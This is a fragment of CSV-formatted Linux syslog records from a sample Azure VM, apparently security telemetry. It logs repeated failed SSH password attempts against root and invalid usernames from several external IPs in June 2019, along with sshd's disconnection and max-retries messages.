+13744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:21,UbuntuDevEnv,2019-06-26 04:46:21,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:21,UbuntuDevEnv,2019-06-26 04:46:21,auth,UbuntuDevEnv,info,Failed password for invalid user jira from 200.6.188.38 port 16062 ssh2,739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,200.6.188.3,16062,,
+13746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:21,UbuntuDevEnv,2019-06-26 04:46:21,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 16062:11: Bye Bye [preauth],739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,16062,,
+13747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:21,UbuntuDevEnv,2019-06-26 04:46:21,auth,UbuntuDevEnv,info,Disconnected from invalid user jira 200.6.188.38 port 16062 [preauth],739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,200.6.188.3,16062,,
+13748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:24,UbuntuDevEnv,2019-06-26 04:46:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:26,UbuntuDevEnv,2019-06-26 04:46:26,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44271 ssh2,753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44271,,
+13750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:29,UbuntuDevEnv,2019-06-26 04:46:28,auth,UbuntuDevEnv,info,Invalid user gateway from 119.123.240.8 port 40633,765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gateway,119.123.240.8,40633,,
+13751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:29,UbuntuDevEnv,2019-06-26 04:46:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:29,UbuntuDevEnv,2019-06-26 04:46:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+13753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:29,UbuntuDevEnv,2019-06-26 04:46:28,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44271 ssh2,753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44271,,
+13754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:31,UbuntuDevEnv,2019-06-26 04:46:30,auth,UbuntuDevEnv,info,Failed password for invalid user gateway from 119.123.240.8 port 40633 ssh2,765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gateway,119.123.240.8,40633,,
+13755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:31,UbuntuDevEnv,2019-06-26 04:46:30,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 40633:11: Bye Bye [preauth],765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,40633,,
+13756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:31,UbuntuDevEnv,2019-06-26 04:46:30,auth,UbuntuDevEnv,info,Disconnected from invalid user gateway 119.123.240.8 port 40633 [preauth],765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gateway,119.123.240.8,40633,,
+13757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:33,UbuntuDevEnv,2019-06-26 04:46:32,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44271 ssh2,753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44271,,
+13758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:40,UbuntuDevEnv,2019-06-26 04:46:40,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:40,UbuntuDevEnv,2019-06-26 04:46:40,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 44271 ssh2 [preauth],753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44271,,
+13760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:40,UbuntuDevEnv,2019-06-26 04:46:40,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:40,UbuntuDevEnv,2019-06-26 04:46:40,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 44271 ssh2],753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44271,,
+13762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:40,UbuntuDevEnv,2019-06-26 04:46:40,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 44271: Too many authentication failures [preauth],753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,44271,,
+13763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:43,UbuntuDevEnv,2019-06-26 04:46:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:45,UbuntuDevEnv,2019-06-26 04:46:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 50287 ssh2,818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50287,,
+13765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:48,UbuntuDevEnv,2019-06-26 04:46:47,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 50287 ssh2,818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50287,,
+13766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:59,UbuntuDevEnv,2019-06-26 04:46:58,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 50287: Too many authentication failures [preauth],818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,50287,,
+13767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:59,UbuntuDevEnv,2019-06-26 04:46:58,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 50287 ssh2],818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50287,,
+13768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:59,UbuntuDevEnv,2019-06-26 04:46:58,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 50287 ssh2 [preauth],818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50287,,
+13769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:59,UbuntuDevEnv,2019-06-26 04:46:58,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:59,UbuntuDevEnv,2019-06-26 04:46:58,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:01,UbuntuDevEnv,2019-06-26 04:47:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:03,UbuntuDevEnv,2019-06-26 04:47:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56032 ssh2,882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56032,,
+13773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:04,UbuntuDevEnv,2019-06-26 04:47:03,auth,UbuntuDevEnv,info,Invalid user boldwin from 5.135.161.72 port 52230,902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,boldwin,5.135.161.7,52230,,
+13774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:04,UbuntuDevEnv,2019-06-26 04:47:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:04,UbuntuDevEnv,2019-06-26 04:47:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:05,UbuntuDevEnv,2019-06-26 04:47:05,auth,UbuntuDevEnv,info,Failed password for invalid user boldwin from 5.135.161.72 port 52230 ssh2,902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,boldwin,5.135.161.7,52230,,
+13777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:05,UbuntuDevEnv,2019-06-26 04:47:05,auth,UbuntuDevEnv,info,Disconnected from invalid user boldwin 5.135.161.72 port 52230 [preauth],902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,boldwin,5.135.161.7,52230,,
+13778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:05,UbuntuDevEnv,2019-06-26 04:47:05,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 52230:11: Bye Bye [preauth],902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,52230,,
+13779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:06,UbuntuDevEnv,2019-06-26 04:47:05,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56032 ssh2,882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56032,,
+13780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:09,UbuntuDevEnv,2019-06-26 04:47:09,auth,UbuntuDevEnv,info,Invalid user 14789630 from 95.216.195.95 port 47896,926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,14789630,95.216.195.9,47896,,
+13781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:09,UbuntuDevEnv,2019-06-26 04:47:08,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56032 ssh2,882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56032,,
+13782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:09,UbuntuDevEnv,2019-06-26 04:47:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:09,UbuntuDevEnv,2019-06-26 04:47:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:11,UbuntuDevEnv,2019-06-26 04:47:11,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56032 ssh2,882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56032,,
+13785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:12,UbuntuDevEnv,2019-06-26 04:47:11,auth,UbuntuDevEnv,info,Failed password for invalid user 14789630 from 95.216.195.95 port 47896 ssh2,926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,14789630,95.216.195.9,47896,,
+13786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:12,UbuntuDevEnv,2019-06-26 04:47:11,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 47896:11: Bye Bye [preauth],926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,47896,,
+13787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:12,UbuntuDevEnv,2019-06-26 04:47:11,auth,UbuntuDevEnv,info,Disconnected from invalid user 14789630 95.216.195.95 port 47896 [preauth],926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,14789630,95.216.195.9,47896,,
+13788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:14,UbuntuDevEnv,2019-06-26 04:47:14,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56032 ssh2,882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56032,,
+13789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:17,UbuntuDevEnv,2019-06-26 04:47:16,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 56032: Too many authentication failures [preauth],882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,56032,,
+13790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:17,UbuntuDevEnv,2019-06-26 04:47:16,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56032 ssh2,882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56032,,
+13791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:17,UbuntuDevEnv,2019-06-26 04:47:16,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:17,UbuntuDevEnv,2019-06-26 04:47:16,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 56032 ssh2 [preauth],882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56032,,
+13793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:17,UbuntuDevEnv,2019-06-26 04:47:16,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:19,UbuntuDevEnv,2019-06-26 04:47:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:22,UbuntuDevEnv,2019-06-26 04:47:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61707 ssh2,957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61707,,
+13796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:24,UbuntuDevEnv,2019-06-26 04:47:24,auth,UbuntuDevEnv,info,Did not receive identification string from 119.123.240.8 port 44142,976,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,44142,,
+13797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:24,UbuntuDevEnv,2019-06-26 04:47:24,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61707 ssh2,957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61707,,
+13798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:27,UbuntuDevEnv,2019-06-26 04:47:26,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61707 ssh2,957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61707,,
+13799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:35,UbuntuDevEnv,2019-06-26 04:47:35,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 61707 ssh2 [preauth],957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61707,,
+13800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:35,UbuntuDevEnv,2019-06-26 04:47:35,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 61707: Too many authentication failures [preauth],957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,61707,,
+13801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:35,UbuntuDevEnv,2019-06-26 04:47:35,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:35,UbuntuDevEnv,2019-06-26 04:47:35,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:35,UbuntuDevEnv,2019-06-26 04:47:35,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 61707 ssh2],957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61707,,
